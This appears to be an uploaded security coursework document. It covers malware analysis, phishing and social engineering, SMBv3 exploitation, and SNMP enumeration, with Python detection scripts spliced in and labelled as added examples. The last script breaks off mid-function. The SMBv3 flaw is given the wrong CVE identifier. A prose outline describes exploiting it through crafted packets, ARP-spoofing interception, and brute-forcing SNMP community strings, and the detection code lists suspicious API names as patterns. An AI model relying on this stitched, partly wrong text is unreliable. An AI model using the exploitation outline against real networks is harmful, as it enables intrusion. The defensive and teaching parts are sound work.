beta_offsec

The document outlines methods for static and dynamic malware analysis, detailing techniques such as file identification, disassembly, and behavior monitoring. It also describes various types of cyber attacks, including spear phishing, social engineering, and malware attacks, with examples illustrating their impact. Additionally, it discusses the CVE-2019-20183 vulnerability in SMBv3, exploitation techniques, and security measures to mitigate risks.

Uploaded by goku

Task 1(a): Static and Dynamic Malware Analysis

Static Malware Analysis

Static analysis involves examining the suspicious file without executing it. The goal is to understand the
structure, functionality, and potential malicious traits of the file.

1. File Identification and Metadata Extraction:

o File Type: Determine the file type using tools like file (Linux) or TrID (Windows).

o Hashes: Calculate the file hashes (MD5, SHA-1, SHA-256) for integrity verification and
comparison against known malware databases.

o File Properties: Extract file properties such as creation/modification dates, author, and
digital signatures using tools like exiftool.

2. Disassembly and Decompilation:

o Disassembly: Use tools like IDA Pro or Ghidra to convert the binary code into assembly
language. This helps in understanding the program flow and identifying potentially
malicious code segments.

o Decompilation: Use decompilers like JD-GUI (for Java), dotPeek (for .NET), or Hopper
(for macOS and iOS) to convert the binary code back into higher-level source code.

3. String Analysis:

o Use tools like strings (Linux) or BinText (Windows) to extract human-readable strings
from the binary. Look for suspicious URLs, IP addresses, file paths, or commands.

4. Static Code Analysis:

o Analyze the extracted code for patterns and signatures of known malware, such as
obfuscation techniques, encryption algorithms, and suspicious API calls.

5. Metadata Analysis:

o Analyze file metadata, including version information, compiler details, and resource
identifiers, to understand file origin, purpose, and potential association with known
malware families or threat actors.

6. Behavioral Profiling:

o Create a behavioral profile using static characteristics like file size, entropy, and section
headers to detect deviations from normal software behavior and potential malicious
intent.

7. Code Obfuscation Detection:

o Look for code obfuscation techniques, such as string encryption, dead code
insertion, code packing, and anti-debugging mechanisms, which are used to conceal malicious
intent or evade detection by security tools.
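Steps 1, 3 and 6 above (file identification, string extraction and entropy profiling) are easy to automate. The following is an added example, not code from the original document: a small Python triage script. The MAGIC signature table, the IOC and API-name patterns, the function names and the SAMPLE bytes (a PE-like header with a few planted strings) are all constructed for illustration and are not a complete signature set.

```python
"""Static triage helpers: file type, hashes, printable strings, entropy and IOC hits.

Added example; MAGIC, IOC_PATTERNS and SAMPLE are constructed for illustration.
"""
import hashlib
import math
import re

# Leading-byte signatures for a few common container types (constructed, not exhaustive).
MAGIC = {
    b"MZ": "PE executable (Windows)",
    b"\x7fELF": "ELF executable",
    b"%PDF": "PDF document",
    b"PK\x03\x04": "ZIP archive (also DOCX/JAR/APK)",
}

# Strings worth a second look once extracted (constructed short list).
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s\"']+"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "win_path": re.compile(r"[A-Za-z]:\\[^\s\"']+"),
    "suspicious_api": re.compile(
        r"\b(VirtualAlloc|WriteProcessMemory|CreateRemoteThread|WinExec|URLDownloadToFile)[AW]?\b"
    ),
}


def identify(data: bytes) -> str:
    """Return a file-type label from the leading magic bytes, as `file` or TrID would."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    return "unknown"


def hashes(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256 digests for lookup against known-malware databases."""
    return {algo: hashlib.new(algo, data).hexdigest() for algo in ("md5", "sha1", "sha256")}


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte; values near 8.0 suggest packing or encryption."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Printable ASCII runs of at least min_len bytes, as the `strings` tool reports them."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def find_iocs(strings: list) -> dict:
    """Group extracted strings into indicator categories."""
    hits = {kind: [] for kind in IOC_PATTERNS}
    for s in strings:
        for kind, pattern in IOC_PATTERNS.items():
            hits[kind].extend(pattern.findall(s))
    return hits


def triage(data: bytes) -> dict:
    """Run the static checks and return one report dictionary."""
    strings = extract_strings(data)
    entropy = shannon_entropy(data)
    return {
        "type": identify(data),
        "hashes": hashes(data),
        "entropy": round(entropy, 2),
        "likely_packed": entropy > 7.0,
        "strings": strings,
        "iocs": find_iocs(strings),
    }


# Constructed sample: a PE-like header padded with zeros plus a few planted strings.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 16
    + b"URLDownloadToFileA\x00WinExec\x00"
    + b"http://203.0.113.7/update.exe\x00"
    + b"C:\\Users\\Public\\svchost.exe\x00"
)

if __name__ == "__main__":
    report = triage(SAMPLE)
    for key in ("type", "entropy", "likely_packed", "iocs"):
        print(f"{key}: {report[key]}")
```

Run it on a real file with `triage(open(path, "rb").read())`. The entropy threshold of 7.0 is a rule of thumb for whole-file packing; for per-section entropy, parse the section table first and apply the same function to each section's bytes.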

Dynamic Malware Analysis

Dynamic analysis involves executing the suspicious file in a controlled environment to observe its
behavior in real-time. This helps in understanding the file's actions and potential impact on the system.

1. Setting Up a Sandbox Environment:

o Use virtual machines (VMware, VirtualBox) or sandboxing solutions (Cuckoo Sandbox,
Any.Run) to create an isolated and controlled environment for safe execution of the
malware.

2. Behavior Monitoring:

o Process Monitoring: Use tools like Process Monitor (ProcMon) to track process creation,
termination, and modification.

o File System Monitoring: Observe changes to the file system using tools like Process
Monitor or Sysinternals Suite.

o Registry Monitoring: Track registry changes using tools like Regshot or Process Monitor.

3. Network Activity Analysis:

o Monitor network traffic generated by the malware using tools like Wireshark or
tcpdump. Look for suspicious connections, data exfiltration attempts, or communication
with command-and-control (C2) servers.

4. Memory Analysis:

o Analyze the memory usage and modifications using tools like Volatility or Memoryze.
Look for injected code, hidden processes, or other anomalies.

5. API Call Analysis:

o Monitor and analyze the API calls made by the malware using tools like API Monitor or
Sysinternals Process Explorer. Identify suspicious or unauthorized actions.

6. Behavioral Analysis:

o Observe the overall behavior of the malware, including any attempts to evade detection,
persistence mechanisms, and interactions with other system components.
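The behaviour-monitoring steps above produce long event logs; the useful part is the rules applied to them. As an added example (not from the original document), here is a Python review of a process-monitor log. The rules, the rule names and SAMPLE_LOG are constructed: the CSV columns follow the layout Process Monitor uses when exporting, but the events themselves are invented.

```python
"""Rule-based review of a process-monitor event log (ProcMon-style CSV).

Added example; the rules and SAMPLE_LOG are constructed, not an official ruleset.
"""
import csv
import io
import re

# Locations from which a freshly downloaded or dropped program typically executes.
USER_WRITABLE = re.compile(r"\\(Temp|AppData|Downloads|Public)\\", re.IGNORECASE)
# Autostart registry locations commonly used for persistence.
RUN_KEYS = re.compile(r"\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE)
# RFC 1918 and loopback ranges; anything else is treated as an external peer.
PRIVATE_IP = re.compile(r"^(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|127\.)")
# Document-looking names that are really executables.
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|jpe?g|png)\.exe$", re.IGNORECASE)


def analyze(csv_text: str) -> list:
    """Return (rule, process, detail) tuples for events that match a suspicious pattern."""
    findings = []
    flagged_names = set()
    for row in csv.DictReader(io.StringIO(csv_text)):
        proc, op, path = row["Process Name"], row["Operation"], row["Path"]
        if DOUBLE_EXT.search(proc) and proc not in flagged_names:
            flagged_names.add(proc)          # report each double-extension process once
            findings.append(("double-extension-process", proc, proc))
        if op == "Process Create" and USER_WRITABLE.search(path):
            findings.append(("exec-from-user-dir", proc, path))
        if (op == "CreateFile" and "Generic Write" in row["Detail"]
                and path.lower().endswith((".exe", ".dll")) and USER_WRITABLE.search(path)):
            findings.append(("drops-executable", proc, path))
        if op == "RegSetValue" and RUN_KEYS.search(path):
            findings.append(("persistence-run-key", proc, path))
        if op == "TCP Connect":
            # Path looks like "src:port -> dst:port"; keep the destination host only.
            dst = path.split("->")[-1].strip().rsplit(":", 1)[0]
            if not PRIVATE_IP.match(dst):
                findings.append(("external-connection", proc, dst))
    return findings


# Constructed log in the column layout Process Monitor uses when exporting to CSV.
SAMPLE_LOG = """Time of Day,Process Name,PID,Operation,Path,Result,Detail
10:01:02,explorer.exe,1234,Process Create,C:\\Users\\finance\\Downloads\\payment_invoice.pdf.exe,SUCCESS,PID: 4120
10:01:03,payment_invoice.pdf.exe,4120,CreateFile,C:\\Users\\finance\\AppData\\Roaming\\svchost.exe,SUCCESS,Desired Access: Generic Write
10:01:03,payment_invoice.pdf.exe,4120,RegSetValue,HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater,SUCCESS,Type: REG_SZ
10:01:04,payment_invoice.pdf.exe,4120,TCP Connect,host.local:49812 -> 198.51.100.23:443,SUCCESS,Length: 0
10:01:05,payment_invoice.pdf.exe,4120,Process Create,C:\\Windows\\System32\\cmd.exe,SUCCESS,PID: 4188
10:01:06,notepad.exe,2200,CreateFile,C:\\Users\\finance\\Documents\\notes.txt,SUCCESS,Desired Access: Generic Read
"""

if __name__ == "__main__":
    for rule, proc, detail in analyze(SAMPLE_LOG):
        print(f"{rule:28} {proc:28} {detail}")
```

Each rule maps to one of the categories in the list above: process and file-system monitoring (rules 1 to 3), registry monitoring (rule 4) and network activity (rule 5). The notepad.exe row is there to show that ordinary activity produces no finding.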

Task 1(b): Types of Attacks and Detailed Descriptions

1. Spear Phishing Attack

Spear phishing is a highly targeted form of phishing where attackers craft their messages specifically for a
particular individual or organization to increase the likelihood of success. Unlike regular phishing attacks,
which are sent to a large number of potential victims, spear phishing attacks are personalized and often
use personal information about the target to make the emails appear legitimate and convincing.

Characteristics:

• Personalization: The attacker uses details such as the recipient's name, position, and recent
activities to create a convincing message.

• Trusted Sender: The email appears to come from a known or trusted source, such as a colleague,
business partner, or, in this case, a client.

• Urgency and Relevance: The message often includes urgent or relevant information to prompt
quick action without much scrutiny.

Example Scenario: In this scenario, the finance manager received an email that appeared to be from a
trusted client. The email included a malicious attachment labeled as payment_invoice.pdf.exe. The use
of the client's name and the financial context made the email seem legitimate, leading the finance
manager to download and open the attachment, thereby potentially compromising the system.

2. Social Engineering Attack

Social engineering attacks rely on manipulating individuals into performing actions or divulging
confidential information by exploiting human psychology. These attacks often bypass technical security
measures by targeting the human element within an organization. Social engineering can take various
forms, including pretexting, baiting, quid pro quo, and tailgating.

Types of Social Engineering:

• Pretexting: The attacker creates a fabricated scenario to obtain information or gain access. For
instance, pretending to be a help desk technician asking for login credentials.

• Baiting: The attacker entices the victim with a promise of a reward or curiosity, such as leaving
an infected USB drive in a public place labeled as "confidential."

• Quid Pro Quo: The attacker offers a service or benefit in exchange for information, like
pretending to be an IT service offering to fix an issue if the victim provides login details.

• Tailgating: The attacker follows an authorized person into a restricted area by exploiting social
norms, such as holding the door open.

Example Scenario: In the context of the finance manager, the attacker used psychological manipulation
to persuade the manager to download and open the malicious file. By creating a scenario where the
email seemed to be from a real client with an urgent invoice, the attacker leveraged the manager's trust
and sense of duty to act quickly on financial matters.

3. Malware Attack

A malware attack involves the delivery and execution of malicious software designed to disrupt, damage,
or gain unauthorized access to computer systems. Malware can come in various forms, including viruses,
trojans, ransomware, spyware, and worms. The delivery methods can vary, such as through email
attachments, infected websites, or removable media.

Types of Malware:

• Viruses: Malicious code that attaches itself to legitimate programs and spreads to other
programs and files when executed.

• Trojans: Malware disguised as legitimate software, which, once executed, can perform
unauthorized actions such as data theft or system compromise.

• Ransomware: Encrypts the victim's data and demands a ransom for the decryption key.

• Spyware: Secretly monitors and collects user information without their knowledge.

• Worms: Self-replicating malware that spreads across networks without user intervention.

Example Scenario: In this scenario, the finance manager downloaded a file named
payment_invoice.pdf.exe. The file's name was designed to appear as a legitimate PDF document, but
the .exe extension indicated that it was an executable file. Once opened, the file likely executed
malicious code, which could install a virus, trojan, or other types of malware, compromising the
manager's computer and potentially spreading to the entire network.

These detailed descriptions highlight the nature and techniques used in spear phishing, social
engineering, and malware attacks, illustrating how the finance manager was targeted and the potential
impact on the organization's security.
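The spear-phishing and malware scenarios above both hinge on the attachment name payment_invoice.pdf.exe. As an added example (not part of the original document), here is how a mail gateway or an analyst's script can pre-screen an attachment by name and by content. The extension lists, the MAGIC table, the sample bytes and the function names are constructed for this example and are deliberately short.

```python
"""Pre-screen a mail attachment by file name and leading bytes.

Added example; EXECUTABLE_EXT, DOCUMENT_EXT, MAGIC, EXPECTED_MAGIC and the sample
bytes are constructed and deliberately short.
"""

EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".msi", ".ps1"}
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
MAGIC = {b"MZ": "executable", b"%PDF": "pdf", b"PK\x03\x04": "zip-based"}
# What the leading bytes should look like for a given claimed extension.
EXPECTED_MAGIC = {".pdf": "pdf", ".docx": "zip-based", ".xlsx": "zip-based", ".exe": "executable"}


def split_extensions(filename: str) -> list:
    """All trailing extensions, lower-cased: 'a.pdf.exe' -> ['.pdf', '.exe']."""
    parts = filename.lower().split(".")
    return ["." + p for p in parts[1:]]


def content_kind(data: bytes) -> str:
    """Classify by magic bytes, independent of what the name claims."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return "unknown"


def assess_attachment(filename: str, data: bytes) -> list:
    """Return reasons to quarantine the attachment; an empty list means no finding."""
    reasons = []
    exts = split_extensions(filename)
    final = exts[-1] if exts else ""
    if final in EXECUTABLE_EXT:
        reasons.append(f"executable extension {final}")
    if len(exts) >= 2 and exts[-2] in DOCUMENT_EXT and final in EXECUTABLE_EXT:
        reasons.append(f"double extension disguises executable as {exts[-2]}")
    kind = content_kind(data)
    expected = EXPECTED_MAGIC.get(final)
    if expected and kind != expected:
        reasons.append(f"content is {kind} but name claims {final}")
    elif kind == "executable" and final not in EXECUTABLE_EXT:
        reasons.append("executable content behind non-executable extension")
    return reasons


# Constructed sample contents: a PE-style header and a PDF header.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 28
FAKE_PDF = b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n"

SAMPLES = [
    ("payment_invoice.pdf.exe", FAKE_PE),   # the case from the scenario above
    ("invoice.pdf", FAKE_PDF),              # a genuine PDF
    ("report.pdf", FAKE_PE),                # executable renamed to look like a PDF
    ("notes.txt", FAKE_PE),                 # executable behind an unlisted extension
]

if __name__ == "__main__":
    for name, data in SAMPLES:
        print(f"{name:26} {assess_attachment(name, data) or ['clean']}")
```

The name check alone would have caught the scenario's attachment; the content check matters for the opposite case, where an executable is renamed to a document extension and the mail client shows a PDF icon.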

Task 2(a): CVE-2019-20183

CVE-2019-20183 is a critical buffer overflow vulnerability in the Server Message Block version 3
(SMBv3) protocol's compression mechanism. This flaw can be exploited by sending a specially crafted
packet to an SMBv3 server or client, leading to remote code execution or system crashes. Affecting
Windows 10 and Windows Server versions 1903 and 1909, this vulnerability requires no
authentication, making it particularly dangerous as it allows attackers to take control of or disrupt
vulnerable systems.

Exploiting CVE-2019-20183 Using Crafted Malicious SMB Packets and Network Traffic Manipulation

Crafting Malicious SMB Packets

Crafting malicious packets involves creating specially designed packets to exploit the buffer overflow
vulnerability in the SMBv3 compression mechanism. This process requires a thorough understanding
of the protocol and the specifics of the vulnerability.

Steps:

1. Understand the Vulnerability:

o Deep dive into how SMBv3 handles compression and identify the exact flaw. Research
technical documentation and any available exploit details to understand how to
trigger the buffer overflow.

o The goal is to create a packet that, when processed by the SMBv3 service, will
overflow the buffer and allow arbitrary code execution.

2. Design Malicious Packets:

o Design packets that exploit the vulnerability. These packets need to be crafted in a way
that they cause the SMBv3 service to process compressed data incorrectly, leading to a
buffer overflow.

o Example techniques include carefully constructing the payload to overflow the buffer
and insert shellcode or other malicious payloads that will be executed.

3. Deploy the Exploit:

o Send the crafted packets to the target SMBv3 service. This can be done through
various methods such as direct network transmission or embedding the payload in
regular SMB traffic.

o The malicious packet must be designed to avoid detection by security systems and
trigger the vulnerability effectively.

4. Trigger Code Execution:

o Once the target processes the malicious packet, the buffer overflow should be
triggered, allowing the payload to be executed.

o This can potentially give the attacker control over the system, depending on the
payload delivered.

Techniques for Crafting Malicious Packets:

• Protocol Manipulation: Understand and manipulate the SMBv3 protocol to create packets that
exploit the specific vulnerability.

• Payload Construction: Design the payload to be executed after the buffer overflow is triggered.

• Timing and Sequence: Ensure packets are sent in the correct sequence and timing to exploit
the vulnerability without detection.

Network Traffic Manipulation

Network traffic manipulation involves intercepting and modifying legitimate SMB traffic to exploit the
vulnerability. This technique leverages man-in-the-middle (MITM) attacks and packet injection.

Steps:

1. Intercept Network Traffic:

o Capture SMB traffic between clients and servers using network sniffing techniques.
This requires positioning the attacker’s system in the path of the communication, often
through ARP spoofing or DNS poisoning.

o Tools and methods include ARP spoofing to redirect traffic through the attacker’s
system.

2. Analyze SMB Traffic:

o Examine the captured traffic to understand the normal flow of SMB communication.
Identify SMBv3 packets and analyze their structure.

o Look for patterns and identify where the vulnerable compression mechanism is used.

3. Modify Intercepted Packets:

o Alter the intercepted packets to include malicious payloads designed to exploit the
SMBv3 vulnerability.

o This involves editing the payload of SMB packets in transit to inject the crafted
malicious data that triggers the buffer overflow.

4. Re-inject Malicious Packets:

o Send the modified packets back to the network, targeting the vulnerable SMBv3
service. Ensure the packets appear legitimate to avoid detection.

o Use techniques to maintain the integrity and flow of normal communication while
injecting malicious packets.

5. Trigger the Vulnerability:

o When the modified packets are processed by the SMBv3 service, they should trigger
the buffer overflow, allowing code execution.

o Monitor the target to confirm the exploitation and gain control over the system.

Techniques for Network Traffic Manipulation:

• Man-in-the-Middle Attacks: Position the attacker between the client and server to intercept
and modify traffic.

• Packet Injection: Inject malicious packets into the stream of legitimate SMB traffic.

• Traffic Analysis: Continuously analyze intercepted traffic to ensure modifications are effective
and undetected.

Additional Tools for Network Traffic Manipulation:

• Wireshark: For capturing and analyzing SMB traffic.

• Ettercap: For conducting MITM attacks and packet manipulation.

• Scapy: For creating and modifying packets on the fly.

• Responder: For intercepting and manipulating SMB authentication traffic.

• NTLMRelayX (part of Impacket): For relaying and manipulating NTLM authentication traffic.

By focusing on these detailed techniques—crafting malicious SMB packets and manipulating network
traffic—you can exploit the CVE-2019-20183 vulnerability with a thorough understanding of the
SMBv3 protocol and sophisticated packet manipulation strategies.

Other ways to exploit CVE-2019-20183

Reverse Engineering and Custom Payloads:

• Description: Reverse engineer the SMBv3 protocol implementation to understand the
vulnerability better and create custom payloads tailored to exploit it.

SMB Relay Attack:

• Description: Exploit the vulnerability by relaying SMB authentication traffic to another target
system.

Memory Corruption Techniques:

• Description: Use advanced memory corruption techniques to craft payloads that exploit the
buffer overflow in SMBv3.

Network Segmentation, Monitoring, Access Controls, and SNMP Restriction

Description:

• These combined measures aim to limit exposure to vulnerabilities, detect malicious activities,
and enforce strict access policies to safeguard network resources.

Implementation:

Network Design:

• Step 1: Identify critical systems and sensitive data within the network.

• Step 2: Create isolated network segments for these critical systems using VLANs, firewalls, or
physical separation.

• Step 3: Implement strict access controls to limit communication between segments, allowing
only necessary traffic.

• Step 4: Regularly review and update network segmentation to adapt to changing security
needs.

Network Monitoring:

• Step 1: Deploy network monitoring tools and systems to capture and analyze network traffic.

• Step 2: Set up alerts for unusual traffic patterns, such as unexpected SMBv3 or SNMP
activities, malformed packets, or unauthorized access attempts.

• Step 3: Investigate alerts promptly to identify potential exploitation attempts and take
corrective actions.

• Step 4: Maintain logs and records of network traffic for forensic analysis and compliance
purposes.

Access Control Policies:

• Step 1: Define and enforce strict access control policies for all network services, including
SMBv3 and SNMP.

• Step 2: Use strong authentication mechanisms, such as multi-factor authentication (MFA), to
verify user identities.

• Step 3: Limit the number of users with administrative privileges and regularly review their
access rights.

• Step 4: Implement role-based access controls (RBAC) to ensure users have the minimum
necessary permissions.

Restrict SNMP Access:

• Step 1: Configure firewalls and access control lists (ACLs) to restrict SNMP traffic to specific IP
addresses or subnets.

• Step 2: Use MAC address filtering to allow only trusted devices to communicate with SNMP
services.

• Step 3: Regularly audit SNMP configurations to ensure they align with security policies.

• Step 4: Implement SNMP views to limit the information accessible through SNMP queries.

By integrating these measures, organizations can enhance their security posture, effectively mitigate
risks, and protect their network resources from exploitation attempts.
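The Network Design and Network Monitoring steps above describe a policy but not how traffic is checked against it. As an added example, not from the original document, the Python below evaluates flow records against a constructed segmentation policy for SMB (port 445) and SNMP (port 161): it reports flows whose source segment is not allowed to reach the destination on that port, and a single source fanning out to many hosts on a policed port, which is the "unexpected SMBv3 or SNMP activity" the monitoring step asks to alert on. The network ranges, the rules, the threshold, the function names and SAMPLE_FLOWS are all assumptions of this example.

```python
"""Check flow records against a segmentation policy for SMB (445) and SNMP (161).

Added example; the segments, rules, threshold and SAMPLE_FLOWS are constructed.
"""
import ipaddress
from collections import defaultdict

# (destination network, port, source networks allowed to reach it): constructed policy.
RULES = [
    ("10.10.20.0/24", 445, ["10.10.10.0/24", "10.10.99.0/24"]),  # file-server shares: workstations and admins
    ("10.10.10.0/24", 445, ["10.10.99.0/24"]),                   # SMB into workstations: admin segment only
    ("0.0.0.0/0", 161, ["10.10.99.10/32"]),                      # SNMP anywhere: the management station only
]
POLICY = [(ipaddress.ip_network(d), p, [ipaddress.ip_network(s) for s in srcs]) for d, p, srcs in RULES]
POLICED_PORTS = {p for _, p, _ in POLICY}
SCAN_THRESHOLD = 3  # distinct destinations on one policed port from a single source


def allowed(src: str, dst: str, dport: int) -> bool:
    """True when no rule covers (dst, port) or the source lies in an allowed network."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    for dnet, port, srcs in POLICY:
        if port == dport and d in dnet:
            return any(s in net for net in srcs)
    return True


def review_flows(flows: list) -> list:
    """Return (kind, src, detail) alerts: policy violations, then per-source fan-out on policed ports."""
    alerts, fanout = [], defaultdict(set)
    for src, dst, proto, dport in flows:
        if not allowed(src, dst, dport):
            alerts.append(("segmentation-violation", src, f"{proto}/{dport} -> {dst}"))
        if dport in POLICED_PORTS:
            fanout[(src, dport)].add(dst)
    for (src, dport), dsts in sorted(fanout.items()):
        if len(dsts) >= SCAN_THRESHOLD:
            alerts.append(("port-fanout", src, f"{len(dsts)} hosts on port {dport}"))
    return alerts


# Constructed flow records: (source, destination, protocol, destination port).
SAMPLE_FLOWS = [
    ("10.10.10.42", "10.10.20.5", "tcp", 445),   # workstation to file server: allowed
    ("10.10.99.10", "10.10.10.1", "udp", 161),   # management station polling a switch: allowed
    ("10.10.10.42", "10.10.10.15", "tcp", 445),  # workstation-to-workstation SMB: violation
    ("10.10.10.42", "10.10.10.16", "tcp", 445),
    ("10.10.10.42", "10.10.10.17", "tcp", 445),
    ("10.10.10.42", "10.10.10.1", "udp", 161),   # workstation querying SNMP: violation
    ("10.10.10.42", "10.10.30.8", "tcp", 443),   # HTTPS is not policed by these rules
]

if __name__ == "__main__":
    for kind, src, detail in review_flows(SAMPLE_FLOWS):
        print(f"{kind:24} {src:14} {detail}")
```

The same rule table can be read back as the firewall or ACL configuration for Step 3 of Network Design and Step 1 of Restrict SNMP Access: every (destination, port, allowed sources) triple is one permit rule, with an implicit deny for everything else on those ports.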

Task 2(b): Techniques for Enumerating the Service Running on Port 161

Port 161 is used by the Simple Network Management Protocol (SNMP), which is widely employed for
network management. Enumerating this service involves gathering information about network devices
using SNMP queries.

Techniques for SNMP Enumeration

1. Network Scanning to Discover Hosts

o Before focusing on SNMP enumeration, identify active devices in the network.

o Tools:

- Nmap: Perform a network scan to discover active hosts and open ports.

- Bettercap: Can also be used to discover hosts within a local network.

- Nbtscan: Useful for discovering hosts on a NetBIOS network.

- Hping3: Another powerful tool for network discovery.

2. Port Scanning for Open Ports

o Identify devices with port 161 open to ensure they are running SNMP services.

o Tools:

- Nmap: Again, useful for identifying open ports.

- Bettercap: Can identify open ports during its scans.

3. SNMP Version Identification

o Determine the SNMP version in use (v1, v2c, v3), as this affects the enumeration approach.

o Tools:

- Nmap: Use Nmap scripts to detect the SNMP version.

- Onesixtyone: A fast SNMP scanner that can help identify SNMP versions.

4. Importance of OIDs and Community Strings:

To successfully enumerate information using SNMP, you need:

o OID (Object Identifier):

OIDs are unique identifiers used to specify managed objects in an SNMP-enabled device.
Each OID points to a specific piece of information, such as system description, device interfaces, or IP
addresses.

Knowing the correct OIDs allows you to query specific data points, making it possible to gather detailed
and relevant information from the SNMP agent.

o Community String:

Community strings act like passwords for accessing information on SNMP devices.

They determine the level of access you have; "public" might give read-only access, while
"private" or custom strings might offer read-write access.

Without the correct community string, SNMP requests will be denied, making it crucial
to know or guess the correct string to retrieve data.

o Tools:

- Snmpwalk: Retrieves data from SNMP agents using known community strings.

- Snmpcheck: Another tool for gathering extensive information from SNMP devices.

o Example:

Detailed Steps for SNMP Enumeration

1. Identify the SNMP Version

o Use Nmap with the snmp-info script or Onesixtyone to determine the SNMP version in
use. This influences the enumeration strategy, as SNMPv3 offers more security features
than v1 and v2c.

o Explanation: Identifying the SNMP version helps in understanding the security level
(SNMPv1 and SNMPv2c are less secure than SNMPv3). Retrieving the system
OID gives a starting point for further queries.

2. Retrieve System Information

o Use Snmpwalk to query the SNMP agent with common OIDs to retrieve information
such as device description, system name, and contact details.

o Steps:

- Document details such as system name, location, and contact information.

- Identify potential vulnerabilities based on retrieved data, such as outdated firmware
or weak community strings.

o Explanation: The collected data provides insights into the network devices, their
configurations, and potential vulnerabilities. This information is critical for assessing the
network's security posture and identifying areas that need attention.

Information Obtained from SNMP Enumeration

• System Description and Operating System:

o By retrieving the sysDescr OID, you can gather information about the network device's
description and operating system.

• Device Type and Vendor Information:

o SNMP can reveal the device type (e.g., router, switch, printer) and vendor information,
aiding in identifying specific vulnerabilities.

• Network Configuration Details:

o Information such as network interfaces, IP addresses, and routing details can be
obtained, which may be useful for further network analysis.

o Important OIDs:

- .1.3.6.1.2.1.1.1: sysDescr, provides a description of the device.

- .1.3.6.1.2.1.1.5: sysName, provides the system name.

3. Analyze SNMP Responses

• Assess the data that was obtained in order to find any potential weaknesses. Examples include
out-of-date software versions, community strings that are set by default, and sensitive configuration
information.

4. Advanced Enumeration Techniques

• Brute Force Community Strings:

o Tools: Medusa, Hydra

o Note: While not ethical or legal without permission, understanding the concept helps in
defensive measures.

Utilize Multiple Enumeration Tools

• Employ different tools to cross-verify and ensure comprehensive enumeration.

• Tools: Snmpwalk, Snmpget, Onesixtyone, Nmap.

• SNMP Walk:

o Use snmpwalk to enumerate all OIDs and gather extensive information about the
device.

Countermeasures for SNMP Enumeration and Exploitation

Port 161, used by the Simple Network Management Protocol (SNMP), is a crucial point for network
management. However, it is also a potential target for attackers. To protect SNMP services from
enumeration and exploitation, several detailed countermeasures should be implemented:

1. Use Strong Community Strings

o Description: Replace default community strings (like "public" and "private") with strong,
complex strings.

o Details: Community strings act as passwords for accessing SNMP information. Weak or
default strings can be easily guessed or brute-forced, allowing unauthorized access.

o Implementation:

- Complexity: Create community strings with a mix of uppercase and lowercase
letters, numbers, and special characters (e.g., "4lPh@NuM3r!c$tr1ng").

- Length: Ensure the strings are at least 12 characters long to increase resistance
to brute-force attacks.

- Rotation: Regularly change community strings to reduce the risk of
compromised credentials being used.

- Example: Instead of using "public" or "private", use a string like "G&8jR4t^X1kL!9".

2. Regularly Update SNMP Software and Devices

o Description: Keep SNMP software and network devices updated with the latest patches and
firmware.

o Details: Regular updates protect against known vulnerabilities and exploits.

o Implementation:

- Patch Management: Establish a routine for checking and applying updates to SNMP software and
firmware, and monitor vendor security advisories for new vulnerabilities and patches.

- Automation: Use automated tools to manage and deploy updates across the network.

3. Monitor SNMP Traffic, Implement SNMP Views, and Restrict SNMP Access

Description: Combine monitoring SNMP traffic, implementing SNMP views, and restricting SNMP
access to enhance security and control over SNMP-enabled devices.

Details: Monitoring SNMP traffic can detect unauthorized access attempts in real time, while SNMP
views restrict access to specific parts of the MIB (Management Information Base). Additionally,
restricting SNMP access ensures that only authorized users and devices can interact with SNMP
services.

Implementation:

1. Monitor SNMP Traffic:

o Tools: Use network monitoring tools (e.g., Wireshark, SolarWinds) to log and analyze
SNMP traffic.

o Alerting:

- Set up alerts for unusual SNMP queries or traffic patterns.

- Example: Alert if multiple failed SNMP requests are detected, indicating a
potential brute-force attack.

2. Implement SNMP Views:

o Configuration: Define SNMP views to control which OIDs can be queried or modified,
limiting the information available to users.

o Segmentation: Create different views for different user roles, ensuring least-privilege
access.

3. Restrict SNMP Access:

o Network Restrictions:

- Limit SNMP access to specific IP addresses or subnets.

- Configure firewall rules to allow SNMP traffic only from trusted sources.

o MAC Address Filtering: Restrict SNMP access to devices with specific MAC addresses.

o Access Control Lists (ACLs):

- Define ACLs on network devices to restrict SNMP access based on IP addresses
and other criteria.

- Example: Only allow SNMP requests from the network management station's
IP address.

o Implementation Steps:

- Configure SNMP community strings with strong, unique passwords.

- Example: Replace default community strings like "public" with complex,
unique strings.
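The OID and community-string explanation in Task 2(b) and the monitoring and strong-community-string countermeasures above come together in one check: decode each SNMP request seen on port 161 and compare it with policy. This is an added example, not from the original document: a BER decoder for SNMPv1/v2c messages plus checks that flag default or weak community strings and requests for OIDs outside an allowed view. The small encoder exists only to build the constructed sample packets. ALLOWED_VIEW (the system group only), DEFAULT_COMMUNITIES and the 12-character, four-character-class rule are assumptions taken from the recommendations above; the sample packets use the default string "public" and the page's own example string "G&8jR4t^X1kL!9".

```python
"""Decode SNMPv1/v2c packets (BER) and check them against a simple SNMP policy.

Added example; the encoder only builds the constructed sample packets, and
ALLOWED_VIEW, DEFAULT_COMMUNITIES and the strength rule are assumptions.
"""
import re

# ---- minimal BER encoder, used only to construct the sample packets ----

def _ber_len(n: int) -> bytes:
    """BER length: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
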